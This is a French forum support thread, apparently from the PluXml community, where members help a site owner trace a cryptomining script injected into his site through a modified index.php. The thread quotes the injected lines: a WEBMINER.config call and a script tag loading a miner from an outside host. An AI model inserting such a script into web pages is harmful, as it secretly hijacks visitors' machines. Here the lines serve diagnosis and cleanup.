[RESOLU] SOS site Hacké !

bg62

problème peu courant, mais problème inquiétant !!!
je viens de voir que dans l'en-tête de mon site ( www.unesourisetmoi.info ), se trouve ceci :
"
WEBMINER.config({ login: "6157177", pass: null }).power(70);
<!DOCTYPE html>

"
Je ne parviens pas à trouver de où provient cette 'injection' de script malveillant ^^^^
ni même à la supprimer

• il n'y a rien , apparemment, dans les fichiers du thème ... : supprimés et remis = RAS
• passage au thème par défaut : le code malveillant est également présent !!!
• J'ai sur le même hébergement plusieurs dossiers réalisés avec PluXml ou autres et rien n'apparait ...
• le site tourne en 'local' sous "laragon" et cette injection n'existe pas ...

Voilà tout ce que j'ai pu trouver

Si vous pouvez m'aider = SUPER !!!

gcyrillus-nomade

Bonjour,

je confirme, avast me bloque l'accés au site du a un script malveillant.

Questions:
as tu modifié la config de ton hebergement ? (php, htacess, autre )?
depuis quand ?
as tu des backup sur ton hébergement ?
as tu des pubs fournies par un service extérieur et qui s'affichent sur tes pages? (cas classique de site momentanément bloqué du a un script embarqué par une pub malveillante)
as tu tenté de désactiver tes plugins et de les réactiver à un a un pour voir celui qui aurait une faille éventuelle?
utilise tu des js externes ?
etc.

Cdt

bg62

j'ai nettoyé l'hébergement de tous les dossiers ou fichiers qui pouvaient me paraître suspects ...
j'ai effectivement une sauvegarde en local, que j'ai aussi 'nettoyée' et qui ( en local toujours ) ne donne pas du tout ce code
autres renseignements:
version de PluXml : 5.5
si cela risque de provenir des plugins, voici ceux qui sont en ligne :

• UTILISES
  jQuery 1.4.4 - Version 1.7.1 (24/12/2011)
  plxSocialMeta - Version 0.0.1 (19/11/2014)
  plxResponsiveSlidesJs - Version 1.0 (13/10/2013)
  plxMyAutoMetaDescription - Version 1.1 (05/09/2013)
  filAriane - Version 1.1 (21/01/2012)
  ArtGalerie - Version 4.3 (21/07/2015) ( version personnalisée par Rockyhorror )
  MySearch - Version 1.5.3 (13/05/2015)
  scrollToTop - Version 1.0 (22/01/2012)
  plxEditor - Version 1.4.1 (18/11/2015)
  MyContact - Version 1.7 (20/07/2015)
  Blogroll - Version 0.8 (26/07/2015)
  MyAllArchive - Version 1.7.2 (02/09/2015)
  prevNext - Version 1.0 (19/01/2014)
  RSSroll w/ favicons - Version 1.1 (12/04/2013)
  WDD_BanComment - Version 1.1 (11/07/2015)
  ModerationList - Version 6 (30/08/2015)

• NON UTILISES
  AutoSave - Version 0.6 (17/07/2015)
  ShareThis - Version 1.0 (21/10/2013)
  WDD_cache - Version 1.0 (25/02/15)
  About - Version 1.5 (12/06/2012)
  MyPager - Version 1.6 (20/10/2015)
  plxMinifyCache - Version 1.4 (20/04/2013)
  MyAkismet - Version 1.2 (20/05/2015)
  MyBetterUrls - Version 1.4.2 (13/05/2015)
  MyBreadcrumb - Version 1.1 (05/09/2013)
  MyCapchaImage - Version 1.3.1 (23/07/2015)
  MyComRememberMe - Version 1.1 (05/09/2013)
  MyLoremIpsum - Version 1.1 (04/06/2015)
  MyMailComment - Version 1.2.2 (04/06/2015)
  MyPager - Version 1.2.2 (13/05/2015)
  MyPluginDownloader - Version 1.2 (27/01/2015)
  MySkinSelect - Version 1.1.2 (05/11/2012)
  MySocialButtons - Version 1.4.1 (06/11/2014)
  ShareSocialButtons - Version 1.0.2 (23/07/2016)
  plxToolbar - Version 1.3 (15/07/2015)
  Ruban - Version 1.1 (12/10/2013)
  Share Me - Version 0.67 (03/04/2016)
  superContact - Version 1.2 (16/01/2014)
  TinyNav - Version 0.9 Bêta (25/08/2013)

gcyrillus-nomade

Le hack ressemble à un script qui voudrait utilisé depuis ton site des ressources pour de le cryptage de crypto monnaie. un js est peut-être chargé à ton insu . peut-être injecter depuis le hook d'un ou plusieurs plugins?
edit:
en lançant un vieux tails sous linux , j'arrive à ouvrir ta page et je vois bien 2 balises script injectés avant le rendu de la page (peut-être un hook dans index.php détourné ou le htaccess? ).

Je ne connais pas tous ces plugins,
ceux qui peuvent être "dangereux" seront tous ceux qui permettent entre autre l'upload de fichier (si fonction mal encapsulé et accessible sans être logué) , ceux permettant aussi d’éditer, créer des fichiers peuvent aussi être dangereux si ces fonctions peuvent être détourné, via le traitement d'un formulaire par exemple.

Regarde le contenu des plugins, d'abord ceux permettant l'upload, embarquant un formulaire , ceux capable d'éditer/créer des fichiers et enfin les autres (actifs) Pour voir si des fichier ont étaient modifiés ou ajoutés.

Autre piste, ton fichier htaccess , as t-il était modifié?

Connais tu l'adresse IP de ton serveur, si oui, as tu le même soucis en passant par l'IP au lieu du nom de domaine ?

Si d'autres lisant ce post ont d'autres piste de recherches/idées, merci de les partagées

Bon, tu l'auras compris, l'idée est de cherché d’où ça vient, une fois trouvé, on pourra en chercher la cause

++

bg62

Si je fais un essai

• désactiver tous les plugins
• remettre le thème par défaut
  Penses-tu que cela pourrait nous servir ?

gcyrillus-nomade

oui bien sur, si un plugin est un cause, ça limitera le champ de recherche

Par contre bizarre, l'IP de ton site donne une 404 sur un hébergement nginx ? j'ai trouvé cette IP pour ton site 62.210.16.61 sans être certains qu'elle corresponde bien.

++

@bazooka07 si tu passes par ici pourrait tu nous éclairer avec ton expertise ? Cdt

bg62

je vais faire le texte et je te tiens informé
pour le contenu du .htaccess, le voici
`RewriteEngine On
RewriteCond %{HTTP:HTTPS} !on
RewriteRule (.*) https://%{SERVER_NAME}/$1 [QSA,L,R=301]

BEGIN -- Pluxml

Options -Multiviews

RewriteEngine on
RewriteBase /
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteCond %{REQUEST_FILENAME} !-l

Réécriture des urls

RewriteRule ^(?!feed)(.)$ index.php?$1 [L]
RewriteRule ^feed\/(.)$ feed.php?$1 [L]

END -- Pluxml

ErrorDocument 404 /index.php?article399/erreur-404
`
quant à l'adresse IP ... ??? je n'y connais rien ... l'hébergeur est 'online' ( Scaleway Dedibox - Scaleway SAS )...

bg62

OUPS ... ben je me vois donc bien mal parti là ...

• remis le thème par défaut
• • TOUS les plugins désactivés + rien de changé ( à moins que qq chose puisse rester en cache ??? )
    

kowalsky

@bg62 demande de l’assistance à ton hébergeur. Si ton site s'est fait hack, ils sont là pour t'aider.

Dans ton entête il y a surtout cette ligne à désactiver : <script src="https://wm.bmwebm.org/WEBMINER.js"></script>

Tu dis que tu as supprimé tous les fichiers suspects, mais le mieux c'est de tout supprimer, vérifier ce qu'il se passe en installant une bete page index.php, et si rien de particulier, réinstaller tout ton site depuis une sauvegarde.

bg62

@kowalsky pour le 'hack' n'ayant pas l'option 'sauvegarde' sur l'hébergement je ne pense pas trop que l'assistance puisse m'être très utile ....
quant à enlever (tout) tester et replacer .. si je n'ai pas trouvé 'avant' de où provient cette injection je la remettrai aussi dans ce cas
pas évident

gcyrillus-nomade

re, si ton site est en hebergement mutualisé et que tu ne trouve rien sur ton FTP / fichiers du site, c'est probablement l'hebergement qui à étéit hacké (donc à priori tous les sites sur le même serveur) , donc comme le dit @kowalsky , c'est du ressort de ton hébergeur

Tu peut faire le test de kowalsky avec index.php . renomme le et met en un autre avec rien ou un morceau de html, puis vérifie le code source. si le script est toujours là , il n'y aurait que ton hébergeur pour solutionner le soucis surement communs à d'autre sites.

Maintenant j'ai

Une erreur est survenue pendant une connexion à www.unesourisetmoi.info. PR_CONNECT_RESET_ERROR

Code d’erreur : PR_CONNECT_RESET_ERROR

    La page que vous essayez de consulter ne peut pas être affichée car l’authenticité des données reçues ne peut être vérifiée.
    Veuillez contacter les propriétaires du site web pour les informer de ce problème.

Ton hébergeur est peut-être déjà au courant et en train de remettre les choses au carré , contacte le tout de même

Cdt

bg62

Essaie de voir dans d'autres dossiers existant sur le site comme
https://www.unesourisetmoi.info/tunisie/

https://www.unesourisetmoi.info/minimal/

https://www.unesourisetmoi.info/screensavers/

https://www.unesourisetmoi.info/ze/

https://www.unesourisetmoi.info/mer/

Etc. ..
apparemment rien au niveau du hack .... il n'y aurait que sur la partie principale avec 'PluXml' ....

🤔

gcyrillus-nomade

C’était le fichier index.php modifié avec ces deux lignes supplémentaire. aucune idée comment cela s'est produit

bg62

SUPER !!! et grands mercis +100
Libéré d'un gros problème en quelques heures, c'est TOP de pouvoir trouver ainsi de l'aide rapide et totalement désintéressée, une des choses qui en 2023 commence à manquer cruellement en ce bas Monde
@kowalsky avait ... supputé mais il est vrai comme le dit @gcyrillus-nomade que ceci est plus que étrange car pas de traces sur l'hébergement, pas de trace non plus sur la sauvegarde en local ... un mystère, résolu, mais qui reste complet pour moi ...
à espérer que personne d'autre ne connaîtra la même mésaventure
bonne journée à tous